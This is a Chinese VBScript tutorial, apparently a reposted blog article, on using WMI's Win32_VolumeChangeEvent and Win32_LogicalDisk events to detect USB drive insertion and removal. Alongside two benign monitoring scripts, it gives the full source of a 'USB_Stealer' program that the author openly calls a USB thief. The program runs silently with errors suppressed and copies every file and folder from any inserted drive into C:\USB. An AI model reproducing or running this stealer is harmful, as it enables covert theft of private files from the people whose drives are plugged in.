用VBS检测U盘插入与弹出事件的代码
2016-07-07来源:

可以说,对WMI的掌握程度的多少直接决定了你的VBS水平高低。看过网上普遍流传VBS版U盘小偷程序,基本上都是靠无限循环实现的,一点技术含量也没有,文章的末尾给出了我写的VBS版U盘小偷程序的下载地址。虽然用WMI也得无限循环,但是效率是不一样的。

使用WMI的Win32_VolumeChangeEvent类就可以实现,下面是示例代码,更详细的信息请参考MSND文档。

代码如下:

Const Configuration_Changed = 1

Const Device_Arrival = 2

Const Device_Removal = 3

Const Docking = 4

strComputer = "."

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" _

& strComputer & "\root\cimv2")

Set colMonitoredEvents = objWMIService. _

ExecNotificationQuery( _

"Select * from Win32_VolumeChangeEvent")

Do

Set objLatestEvent = colMonitoredEvents.NextEvent

Select Case objLatestEvent.EventType

Case Device_Arrival

WScript.Echo "U盘插入,盘符为" & _

objLatestEvent.DriveName

Case Device_Removal

WScript.Echo "U盘弹出,盘符为" & _

objLatestEvent.DriveName

End Select

Loop

我也写了一个U盘小偷程序,自以为比网上抄来抄去的代码要好,感兴趣的可以下载来看看。

代码如下:

'==========================================

'Name : USB_Stealer

'Date : 2010/5/25

'Author : Demon

'Copyright : Copyright (c) 2010 Demon

'E-Mail : still.demon@gmail.com

'QQ : 380401911

'Website : http://demon.tw

'==========================================

'Option Explicit

On Error Resume Next

Const Target_Folder = "C:\USB"

Call Main()

Sub Main()

On Error Resume Next

Const Device_Arrival = 2

Const Device_Removal = 3

Const strComputer = "."

Dim objWMIService, colMonitoredEvents, objLatestEvent

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" _

& strComputer & "\root\cimv2")

Set colMonitoredEvents = objWMIService. _

ExecNotificationQuery( _

"Select * from Win32_VolumeChangeEvent")

Do

Set objLatestEvent = colMonitoredEvents.NextEvent

Select Case objLatestEvent.EventType

Case Device_Arrival

Copy_File objLatestEvent.DriveName

End Select

Loop

End Sub

Sub Copy_File(Folder_Path)

On Error Resume Next

Dim fso,file,folder

Set fso = CreateObject("scripting.filesystemobject")

If Not fso.FolderExists(Target_Folder) Then

fso.CreateFolder(Target_Folder)

End If

For Each file In fso.GetFolder(Folder_Path).Files

file.Copy Target_Folder & "\" & file.Name,True

Next

For Each folder In fso.GetFolder(Folder_Path).SubFolders

folder.Copy Target_Folder & "\" & folder.Name,True

Next

End Sub

鉴于很多人反映之前写的那篇在XP下无效,做了一下修改。说是修改,其实是直接复制粘贴脚本专家的代码。

代码如下:

strComputer = "."

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set colEvents = objWMIService.ExecNotificationQuery _

("Select * From __InstanceOperationEvent Within 10 Where " _

& "TargetInstance isa 'Win32_LogicalDisk'")

Do While True

Set objEvent = colEvents.NextEvent

If objEvent.TargetInstance.DriveType = 2 Then

Select Case objEvent.Path_.Class

Case "__InstanceCreationEvent"

Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _

" has been added."

Case "__InstanceDeletionEvent"

Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _

" has been removed."

End Select

End If

Loop

推荐信息
Baidu
map